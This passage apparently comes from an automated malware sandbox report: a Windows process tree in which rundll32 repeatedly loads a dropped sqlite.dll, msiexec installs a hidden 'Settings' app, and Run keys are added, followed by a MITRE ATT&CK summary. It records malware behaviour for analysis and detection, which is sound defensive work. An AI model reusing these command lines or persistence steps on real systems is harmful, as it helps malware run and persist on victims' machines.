- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2272
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3592 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5196 -ip 51961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6172
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:3176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6780 -ip 67801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1528 -ip 15281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:2056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1988 -ip 19881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5912 -ip 59121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7428
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
- Loads dropped DLL
PID:6780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2496 -ip 24961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7556 -ip 75561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:8012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7548 -ip 75481⤵PID:6324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7752 -ip 77521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4708
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5384 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7920 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7604
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7396 -ip 73961⤵PID:5104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 7920 -ip 79201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1044 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:7684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7684 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6036
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 7684 -ip 76841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:7584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:11816
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:4992 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE93CA095283BE95C896B6F9B860EEFB C2⤵
- Loads dropped DLL
PID:4704
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D16043A1CD30750A36DA477DF81D5B8A C2⤵
- Loads dropped DLL
PID:5244
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0917CA864B128D49C7FD491ACCF936BB2⤵
- Blocklisted process makes network request
PID:9576
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B09FF2FDECD680D28AAC9554887447B7 C2⤵PID:11996
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:7632 -
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
- Adds Run key to start application
PID:5704 -
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--iUSIg"4⤵PID:656
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x1f8,0x1f4,0x21c,0x1f0,0x7ffcc565dec0,0x7ffcc565ded0,0x7ffcc565dee05⤵PID:6704
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60da79e70,0x7ff60da79e80,0x7ff60da79e906⤵
- Loads dropped DLL
PID:5304
-
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1584 /prefetch:25⤵PID:6404
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:15⤵PID:4504
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2496 /prefetch:15⤵PID:6796
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=2412 /prefetch:85⤵PID:6536
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1992 /prefetch:85⤵PID:11160
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:25⤵
- Modifies registry class
PID:9536
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3240 /prefetch:85⤵PID:8704
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3612 /prefetch:85⤵PID:8724
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3616 /prefetch:85⤵PID:72
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1828 /prefetch:85⤵PID:6868
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1576 /prefetch:85⤵PID:3996
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D0BC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
PID:7800
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1696 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4260
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5304 -ip 53041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10004 -ip 100041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9944 -ip 99441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8080
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 508 -p 6000 -ip 60001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8732 -ip 87321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
PID:3412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
PID:9548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7248 -ip 72481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 11560 -ip 115601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9616
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:10328 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9344 -s 4683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6632
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 9344 -ip 93441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8644
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8684 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 4483⤵
- Program crash
- Enumerates system info in registry
PID:9304
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7692 -ip 76921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 6576 -ip 65761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 9156 -ip 91561⤵PID:10040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 6472 -ip 64721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4752
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Loads dropped DLL
PID:5708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 840 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 844 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6372 -ip 63721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12160
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1Hidden Files and Directories
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1